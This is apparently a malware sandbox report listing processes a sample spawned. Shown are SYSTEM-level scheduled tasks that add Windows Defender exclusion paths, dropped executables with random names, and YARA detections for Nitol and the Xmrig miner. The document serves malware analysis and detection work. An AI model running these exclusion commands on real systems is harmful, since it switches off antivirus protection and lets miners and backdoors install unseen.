                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
                                                                                                              Imagebase:0x7ff61c6c0000
                                                                                                              File size:235'008 bytes
                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:12
                                                                                                              Start time:22:42:48
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:SCHTASKS /Run /TN "Task1"
                                                                                                              Imagebase:0x7ff61c6c0000
                                                                                                              File size:235'008 bytes
                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:13
                                                                                                              Start time:22:42:48
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                                                                              Imagebase:0x7ff731660000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:14
                                                                                                              Start time:22:42:48
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                                                                              Imagebase:0x7ff61c6c0000
                                                                                                              File size:235'008 bytes
                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:15
                                                                                                              Start time:22:42:48
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff6ee680000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:16
                                                                                                              Start time:22:42:48
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\reg.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                                                                              Imagebase:0x7ff6e1df0000
                                                                                                              File size:77'312 bytes
                                                                                                              MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:17
                                                                                                              Start time:22:42:49
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                                                                              Imagebase:0x7ff731660000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:18
                                                                                                              Start time:22:42:49
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff6ee680000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:19
                                                                                                              Start time:22:42:49
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                                                                                                              Imagebase:0x7ff61c6c0000
                                                                                                              File size:235'008 bytes
                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:20
                                                                                                              Start time:22:42:49
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:SCHTASKS /Run /TN "Task1"
                                                                                                              Imagebase:0x7ff61c6c0000
                                                                                                              File size:235'008 bytes
                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:21
                                                                                                              Start time:22:42:49
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                                                                                              Imagebase:0x7ff731660000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:22
                                                                                                              Start time:22:42:49
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff6ee680000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:23
                                                                                                              Start time:22:42:49
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                                                                              Imagebase:0x7ff61c6c0000
                                                                                                              File size:235'008 bytes
                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:24
                                                                                                              Start time:22:42:49
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\reg.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                                                                                              Imagebase:0x7ff6e1df0000
                                                                                                              File size:77'312 bytes
                                                                                                              MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:25
                                                                                                              Start time:22:42:50
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                                                                              Imagebase:0x7ff731660000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:26
                                                                                                              Start time:22:42:50
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff6ee680000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:27
                                                                                                              Start time:22:42:50
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                                                                                                              Imagebase:0x7ff61c6c0000
                                                                                                              File size:235'008 bytes
                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:28
                                                                                                              Start time:22:42:50
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:SCHTASKS /Run /TN "Task1"
                                                                                                              Imagebase:0x7ff61c6c0000
                                                                                                              File size:235'008 bytes
                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:29
                                                                                                              Start time:22:42:50
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                                                                                              Imagebase:0x7ff731660000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:30
                                                                                                              Start time:22:42:50
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                                                                              Imagebase:0x7ff61c6c0000
                                                                                                              File size:235'008 bytes
                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:31
                                                                                                              Start time:22:42:50
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff6ee680000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:32
                                                                                                              Start time:22:42:50
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\reg.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                                                                                              Imagebase:0x7ff6e1df0000
                                                                                                              File size:77'312 bytes
                                                                                                              MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:33
                                                                                                              Start time:22:42:51
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                                                                              Imagebase:0x7ff731660000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:34
                                                                                                              Start time:22:42:51
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff6ee680000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:35
                                                                                                              Start time:22:42:51
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
                                                                                                              Imagebase:0x7ff61c6c0000
                                                                                                              File size:235'008 bytes
                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:36
                                                                                                              Start time:22:42:51
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:SCHTASKS /Run /TN "Task1"
                                                                                                              Imagebase:0x7ff61c6c0000
                                                                                                              File size:235'008 bytes
                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:37
                                                                                                              Start time:22:42:51
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
                                                                                                              Imagebase:0x7ff731660000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:38
                                                                                                              Start time:22:42:51
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                                                                              Imagebase:0x7ff61c6c0000
                                                                                                              File size:235'008 bytes
                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:39
                                                                                                              Start time:22:42:51
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff6ee680000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:40
                                                                                                              Start time:22:42:51
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\reg.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
                                                                                                              Imagebase:0x7ff6e1df0000
                                                                                                              File size:77'312 bytes
                                                                                                              MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:42
                                                                                                              Start time:22:43:22
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Program Files (x86)\DfP1K3\DfP1K3.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Program Files (x86)\DfP1K3\DfP1K3.exe"
                                                                                                              Imagebase:0xe90000
                                                                                                              File size:54'152 bytes
                                                                                                              MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                              Has exited:false

                                                                                                              Target ID:43
                                                                                                              Start time:22:43:24
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Program Files (x86)\DfP1K3\DfP1K3.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Program Files (x86)\DfP1K3\DfP1K3.exe"
                                                                                                              Imagebase:0xe90000
                                                                                                              File size:54'152 bytes
                                                                                                              MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:44
                                                                                                              Start time:22:43:25
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exe"
                                                                                                              Imagebase:0x840000
                                                                                                              File size:54'152 bytes
                                                                                                              MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                              Has exited:true

                                                                                                              Target ID:45
                                                                                                              Start time:22:43:25
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:cmd /c echo.>c:\xxxx.ini
                                                                                                              Imagebase:0xa40000
                                                                                                              File size:236'544 bytes
                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:46
                                                                                                              Start time:22:43:25
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff6ee680000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:47
                                                                                                              Start time:22:43:26
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Program Files (x86)\DfP1K3\DfP1K3.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Program Files (x86)\DfP1K3\DfP1K3.exe"
                                                                                                              Imagebase:0xe90000
                                                                                                              File size:54'152 bytes
                                                                                                              MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:48
                                                                                                              Start time:22:43:51
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\ProgramData\53jGFr5v.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\ProgramData\53jGFr5v.exe
                                                                                                              Imagebase:0x420000
                                                                                                              File size:1'589'760 bytes
                                                                                                              MD5 hash:C12239FE6BC555339AA48D933FC376D2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 100%, Avira
                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                              Has exited:false

                                                                                                              Target ID:49
                                                                                                              Start time:22:43:58
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\ProgramData\efk2JUeS\lBoqoqIC.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\ProgramData\efk2JUeS\lBoqoqIC.exe
                                                                                                              Imagebase:0x400000
                                                                                                              File size:486'832 bytes
                                                                                                              MD5 hash:AA990DC3875790615E8CB024A78E9F9C
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:false

                                                                                                              Target ID:50
                                                                                                              Start time:22:44:01
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exe"
                                                                                                              Imagebase:0x840000
                                                                                                              File size:54'152 bytes
                                                                                                              MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:51
                                                                                                              Start time:22:44:01
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Program Files (x86)\DfP1K3\DfP1K3.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Program Files (x86)\DfP1K3\DfP1K3.exe"
                                                                                                              Imagebase:0xe90000
                                                                                                              File size:54'152 bytes
                                                                                                              MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:52
                                                                                                              Start time:22:44:04
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\ProgramData\atBs3ba9\d0oKoK2T.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\ProgramData\atBs3ba9\d0oKoK2T.exe 1776
                                                                                                              Imagebase:0x7ff721f20000
                                                                                                              File size:670'720 bytes
                                                                                                              MD5 hash:147936E67DBDD86961409FE7D5821DA6
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000034.00000002.3351062119.00007FF721F21000.00000040.00000001.01000000.00000010.sdmp, Author: Joe Security
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 100%, Avira
                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                              Has exited:false


                                                                                                                Execution Graph

                                                                                                                Execution Coverage:2.1%
                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                Signature Coverage:30.8%
                                                                                                                Total number of Nodes:480
                                                                                                                Total number of Limit Nodes:7

                                                                                                                Control-flow Graph

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: @$@
                                                                                                                • API String ID: 0-149943524
                                                                                                                • Opcode ID: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                                                                                                • Instruction ID: b9b90cad4d4dbad5e60228b5b2812afcd9ff4e9267d7912497f5da913a33a31e
                                                                                                                • Opcode Fuzzy Hash: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                                                                                                • Instruction Fuzzy Hash: 0EE19876619B84CADBA1CB19E4807AAB7A1F3C8795F105116FB8E87B68DB7CC454CF00

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
